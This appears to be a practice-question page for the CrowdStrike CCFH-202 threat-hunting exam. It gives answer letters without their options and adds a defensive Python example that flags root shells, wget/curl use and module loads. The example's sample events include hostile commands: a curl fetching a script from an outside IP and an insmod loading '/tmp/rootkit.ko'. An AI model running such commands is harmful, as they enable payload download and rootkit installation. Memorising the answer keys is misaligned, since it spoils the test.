CrowdStrike CCFH-202 Exam

Certification Provider: CrowdStrike
Exam Name: CrowdStrike Certified Falcon Hunter
Number of questions in our database: 60
Exam Version: Apr. 23, 2024
CCFH-202 Exam Official Topics:
  • Topic 1: Utilize the MITRE ATT&CK Framework to model threat actor behaviors/ Explain what information a bulk (Destination) IP search provides
  • Topic 2: Explain what information a Mac Sensor Report will provide/ Conduct hypothesis and hunting lead generation to prove them out using Falcon tools
  • Topic 3: Identify the vulnerability exploited from an initial attack vector/ Explain what information is in the Events Data Dictionary
  • Topic 4: Explain what information a Hash Execution Search provides/ Explain what information a Bulk Domain Search provides
  • Topic 5: Locate built-in Hunting reports and explain what they provide/ Identify alternative analytical interpretations to minimize and reduce false positives
  • Topic 6: Explain what information is in the Hunting & Investigation Guide/ Differentiate testing, DevOps or general user activity from adversary behavior
  • Topic 7: From the Statistics tab, use the left click filters to refine your search/ Explain what the "join" command does and how it can be used to join disparate queries
  • Topic 8: Convert and format Unix times to UTC-readable time/ Evaluate information for reliability, validity and relevance for use in the process of elimination
  • Topic 9: Explain what information a Source IP Search provides/ Explain what the "table" command does and demonstrate how it can be used for formatting output
  • Topic 10: Demonstrate how to get a Process Timeline/ Analyze and recognize suspicious overt malicious behaviors
Free CrowdStrike CCFH-202 Exam Actual Questions

The questions for CCFH-202 were last updated on Apr. 23, 2024

Question #1

Which of the following does the Hunting and Investigation Guide contain?

Correct Answer: C

The Hunting and Investigation guide contains example Event Search queries useful for threat hunting. These queries are based on common threat hunting use cases and scenarios, such as finding suspicious processes, network connections, registry activity, etc. The guide also explains how to customize and modify the queries to suit different needs and environments. The guide does not contain a list of all event types and their syntax, as that information is provided in the Events Data Dictionary. The guide also does not contain example Event Search queries useful for Falcon platform configuration, as that is not the focus of the guide.


Question #2

Where would an analyst find information about shells spawned by root, Kernel Module loads, and wget/curl usage?

Correct Answer: B

The Linux Sensor report is where an analyst would find information about shells spawned by root, Kernel Module loads, and wget/curl usage. The Linux Sensor report is a pre-defined report that provides a summary view of selected activities on Linux hosts. It shows information such as process execution events, network connection events, file write events, etc. that occurred on Linux hosts within a specified time range. The Sensor Health report, the Sensor Policy Daily report, and the Mac Sensor report do not provide the same information.
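
The three lead types named above (root shells, kernel module loads, wget/curl usage) can be pulled out of raw process events when the pre-built report is not enough. The following is an added example, not CrowdStrike code or a query from the Hunting and Investigation Guide: field names (event_simpleName, ComputerName, UserName, UID_decimal, FileName, CommandLine, ProcessStartTime_decimal) follow the Falcon event naming convention, the event records are constructed for illustration, and treating insmod/modprobe executions as a stand-in for kernel module loads is an assumption of this example. It also converts the Unix epoch timestamps to UTC (Topic 8) and drops a non-root DevOps shell so the filter separates routine automation from the root activity the report is meant to surface (Topic 6).

```python
"""Hunt over constructed Falcon-style Linux process events.

Added example, not CrowdStrike documentation. Field names follow the
Falcon event naming convention; the records are constructed sample input.
"""
from datetime import datetime, timezone

# Constructed sample events (not real telemetry). Timestamps are epoch
# seconds with a fractional part, as in Falcon *_decimal fields.
SAMPLE_EVENTS = [
    {"event_simpleName": "ProcessRollup2", "ComputerName": "web-01",
     "UserName": "root", "UID_decimal": 0, "FileName": "bash",
     "CommandLine": "/bin/bash -i",
     "ProcessStartTime_decimal": 1713859200.123},
    {"event_simpleName": "ProcessRollup2", "ComputerName": "web-01",
     "UserName": "deploy", "UID_decimal": 1001, "FileName": "bash",
     "CommandLine": "bash /opt/deploy/run.sh",
     "ProcessStartTime_decimal": 1713859260.0},
    {"event_simpleName": "ProcessRollup2", "ComputerName": "db-02",
     "UserName": "root", "UID_decimal": 0, "FileName": "curl",
     "CommandLine": "curl -s http://203.0.113.10/x.sh -o /tmp/x.sh",
     "ProcessStartTime_decimal": 1713859320.5},
    {"event_simpleName": "ProcessRollup2", "ComputerName": "db-02",
     "UserName": "root", "UID_decimal": 0, "FileName": "insmod",
     "CommandLine": "insmod /tmp/rootkit.ko",
     "ProcessStartTime_decimal": 1713859380.0},
    # Non-process event: ignored by the classifier below.
    {"event_simpleName": "NetworkConnectIP4", "ComputerName": "db-02",
     "UserName": "root", "UID_decimal": 0, "FileName": "curl",
     "CommandLine": "", "ProcessStartTime_decimal": 1713859321.0},
]

SHELLS = {"bash", "sh", "dash", "zsh", "ksh"}
DOWNLOADERS = {"wget", "curl"}
# Assumption for this example: module loads are approximated by the
# user-space loader binaries rather than a dedicated kernel event.
MODULE_LOADERS = {"insmod", "modprobe"}


def unix_to_utc(ts):
    """Format an epoch timestamp (seconds, possibly fractional) as UTC ISO-8601."""
    return datetime.fromtimestamp(float(ts), tz=timezone.utc).strftime(
        "%Y-%m-%dT%H:%M:%SZ")


def classify(event):
    """Return the lead category for one ProcessRollup2 event, or None."""
    if event.get("event_simpleName") != "ProcessRollup2":
        return None
    name = event.get("FileName", "").lower()
    is_root = event.get("UID_decimal") == 0 or event.get("UserName") == "root"
    if name in SHELLS and is_root:
        return "root_shell"          # shells spawned by root
    if name in DOWNLOADERS:
        return "wget_curl"           # wget/curl usage by any user
    if name in MODULE_LOADERS:
        return "kernel_module_load"  # insmod/modprobe executions
    return None


def hunt(events):
    """Return (utc_time, host, user, category, command) rows sorted by time."""
    rows = []
    for ev in events:
        category = classify(ev)
        if category:
            rows.append((unix_to_utc(ev["ProcessStartTime_decimal"]),
                         ev["ComputerName"], ev["UserName"], category,
                         ev["CommandLine"]))
    rows.sort()
    return rows


if __name__ == "__main__":
    for row in hunt(SAMPLE_EVENTS):
        print(" | ".join(row))
```

The deploy user's bash invocation is intentionally left out of the results: it is a shell, but not a root shell, which is the distinction the report draws. Widening SHELLS or dropping the root check is how an analyst would trade more leads for more false positives.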


Question #3

Which of the following best describes the purpose of the Mac Sensor report?

Correct Answer: D

The Mac Sensor report is the macOS counterpart of the Linux Sensor report: a pre-defined report that provides a comprehensive view of activities occurring on Mac hosts, including items of interest that may be hunting or investigation leads. It does not display a listing of all Mac hosts with or without a Falcon sensor installed, nor does it provide a detection-focused view of known malicious activities occurring on Mac hosts.


Question #4

Which Falcon documentation guide should you reference to hunt for anomalies related to scheduled tasks and other Windows related artifacts?

Correct Answer: A

The Hunting and Investigation guide is the Falcon documentation guide that you should reference to hunt for anomalies related to scheduled tasks and other Windows related artifacts. The Hunting and Investigation guide provides sample hunting queries, select walkthroughs, and best practices for hunting with Falcon. It covers various topics such as process execution, network connections, registry activity, scheduled tasks, and more.

